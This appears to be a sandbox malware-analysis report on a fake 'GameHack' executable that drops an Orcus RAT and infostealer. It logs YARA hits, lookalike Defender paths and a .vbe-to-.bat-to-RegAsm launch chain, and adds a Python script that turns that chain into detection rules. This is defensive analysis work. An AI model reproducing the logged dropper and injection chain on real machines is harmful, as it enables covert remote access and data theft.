                      Source: SSblKNNQege.exe3.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe4.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe5.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: RuntimeBroker.exe0.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamej% vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1266289893.0000000006F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTRMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTRMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: runtimesvc.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe0.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe1.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe2.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: OfficeClickToRun.exe.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@62/65@1/2
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A06EC9 GetLastError, FormatMessageW (0_2_00A06EC9)
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A19E1C FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree (0_2_00A19E1C)
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Program Files (x86)\msecache\OfficeKMS\win8\SSblKNNQege.exe
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\sudo_06kkh814g4vz7sfklrh1emcow75dz383
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\de7a0557f40c2628828635c8b21d0fdfc2f95fd1
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KJuu1JY0vqv02KLL4nsh
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8376:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Users\user\AppData\Local\Temp\tv1xqdyv
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Command line argument: sfxname (0_2_00A1D5D4)
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Command line argument: sfxstime (0_2_00A1D5D4)
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Command line argument: STARTDLG (0_2_00A1D5D4)
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Command line argument: sfxname (8_2_00EED5D4)
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Command line argument: sfxstime (8_2_00EED5D4)
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Command line argument: STARTDLG (8_2_00EED5D4)
Source: GameHackBuild1.exe.bin.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries)
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (27 identical entries)
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: GameHackBuild1.exe.bin.exe | Virustotal: Detection: 61%
Source: GameHackBuild1.exe.bin.exe | ReversingLabs: Detection: 63%
Source: Solara.exe | String found in binary or memory: c/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: c (2 identical entries)
Source: Solara.exe | String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: Solara.exe | String found in binary or memory: es/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery (2 identical entries)
Source: Solara.exe | String found in binary or memory: C:/Users/h3xcode/go/pkg/mod/github.com/lxn/walk@v0.0.0-20210112085537-c389da54e794/stopwatch.go (2 identical entries)
Source: Solara.exe | String found in binary or memory: faceinteger overflow on token CreateBrushIndirect failedSHGetPathFromIDList failed\o/ Walk_TabPage_Class \o/\o/ Walk_WebView_Class \o/AddClipboardFormatListenerGetConsoleScreenBufferInfoempty buffer in CopyBufferhttp: invalid cookie valueread from empty dataBu
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | File read: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
Source: unknown | Process created: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | Process created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumber
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | Process created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumber
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Process created: unknown unknown (7 entries)
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Process created: unknown unknown (8 entries)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Process created: unknown unknown (11 entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
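Read together, the process-creation rows above form one chain: the SFX drops a .vbe into %AppData%\Roaming, WScript runs it, the script launches cmd.exe on a .bat, the .bat starts the real payload, which in turn compiles C# from %TEMP% with csc.exe, starts an argument-less RegAsm.exe from a fake Windows\Defender directory, and fingerprints the disk with WMIC. The script below is an added example for this page, not Joe Sandbox or Sigma output: it encodes each link of that chain as a rule over constructed Sysmon-style process-creation records and shows which rule each row trips. The field names (parent, image, cmdline), the rule names and the EXPECTED_DIR table are this example's own assumptions; the paths are the ones the report lists.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbe", ".vbs", ".js", ".jse", ".wsf")
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
# Assumed table of where these binaries legitimately live; a same-named file elsewhere is a lookalike.
EXPECTED_DIR = {
    "conhost.exe": "c:\\windows\\system32\\",
    "officeclicktorun.exe": "c:\\program files\\common files\\microsoft shared\\clicktorun\\",
}


def base(path):
    return ntpath.basename(path).lower()


def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def match_event(ev):
    """Return the rule names that fire for one process-creation event
    (dict with 'parent', 'image', 'cmdline'; field names are this example's own)."""
    hits = []
    img, parent, cmd = base(ev["image"]), base(ev["parent"]), ev["cmdline"].lower()
    # WScript/CScript executing a script dropped into the user profile
    if img in SCRIPT_HOSTS and in_user_writable(cmd) and cmd.rstrip('" ').endswith(SCRIPT_EXTS):
        hits.append("script_host_runs_script_from_user_profile")
    # script host launching cmd.exe (dropper pattern: .vbe -> cmd /c x.bat -> payload)
    if parent in SCRIPT_HOSTS and img == "cmd.exe":
        hits.append("script_host_spawns_cmd")
    # C# compiled at runtime from a response file in %TEMP%
    if img == "csc.exe" and "\\appdata\\local\\temp\\" in cmd and ".cmdline" in cmd:
        hits.append("csc_compiles_from_temp")
    # RegAsm.exe with no arguments, parented by a user-profile binary: classic injection host
    if img == "regasm.exe" and cmd.strip().strip('"').endswith("regasm.exe") and in_user_writable(ev["parent"]):
        hits.append("regasm_no_args_from_user_profile_parent")
    # disk serial lookup used for VM detection / victim fingerprinting
    if img == "wmic.exe" and "diskdrive" in cmd and "serialnumber" in cmd:
        hits.append("wmic_disk_serial_fingerprint")
    # a Windows\Defender directory that lives under a user-writable path
    if "\\windows\\defender\\" in ev["image"].lower() and in_user_writable(ev["image"]):
        hits.append("defender_path_lookalike")
    expected = EXPECTED_DIR.get(img)
    if expected and not ev["image"].lower().startswith(expected):
        hits.append("system_process_name_in_unexpected_location")
    return hits


def scan(events):
    """Run every rule over every event; returns [(rule, image)] in event order."""
    return [(rule, ev["image"]) for ev in events for rule in match_event(ev)]


R = "C:\\Users\\user\\AppData\\Roaming\\"
EVENTS = [  # constructed from the process-creation rows in this report
    {"parent": "C:\\Users\\user\\Desktop\\GameHackBuild1.exe.bin.exe",
     "image": "C:\\Windows\\SysWOW64\\wscript.exe",
     "cmdline": '"C:\\Windows\\System32\\WScript.exe" "' + R + 'WinRuntimePerfMonitor\\VaCm6yonii0zLXLvCqreXRVqw1.vbe"'},
    {"parent": "C:\\Windows\\SysWOW64\\wscript.exe",
     "image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmdline": 'C:\\Windows\\system32\\cmd.exe /c ""' + R + 'WinRuntimePerfMonitor\\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "'},
    {"parent": R + "WinRuntimePerfMonitor\\runtimesvc.exe",
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "cmdline": '"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe" /noconfig /fullpaths @"C:\\Users\\user\\AppData\\Local\\Temp\\tv1xqdyv\\tv1xqdyv.cmdline"'},
    {"parent": R + "WinRuntimePerfMonitor\\MpDefenderProtector.exe",
     "image": R + "Windows\\Defender\\MpDefenderCoreProtion.exe",
     "cmdline": '"' + R + 'Windows\\Defender\\MpDefenderCoreProtion.exe"'},
    {"parent": R + "Windows\\Defender\\MpDefenderCoreProtion.exe",
     "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "cmdline": '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe"'},
    {"parent": R + "WinRuntimePerfMonitor\\Solara.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic diskdrive get model,serialnumber"},
]

if __name__ == "__main__":
    for rule, image in scan(EVENTS):
        print(f"{rule:45} {image}")
```

Each rule on its own is noisy in a real estate (developers do run csc.exe, admins do query WMIC); the value is in correlating several of them under one process tree within a short window, which is what the report's chain gives you. The EXPECTED_DIR lookup is the cheap form of the "system process name in an unexpected location" check and should be extended with the binaries your own fleet actually ships.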
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Section loaded (in load order):
    <pi-ms-win-core-synch-l1-2-0.dll, <pi-ms-win-core-fibers-l1-1-1.dll (each loaded twice), <pi-ms-win-core-localization-l1-2-1.dll,
    version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll,
    kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll,
    wintypes.dll (loaded 3 times), windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll,
    windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll,
    onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded (in load order):
    version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll,
    cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, apphelp.dll, dlnashext.dll,
    wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: profapi.dllJump to behavior
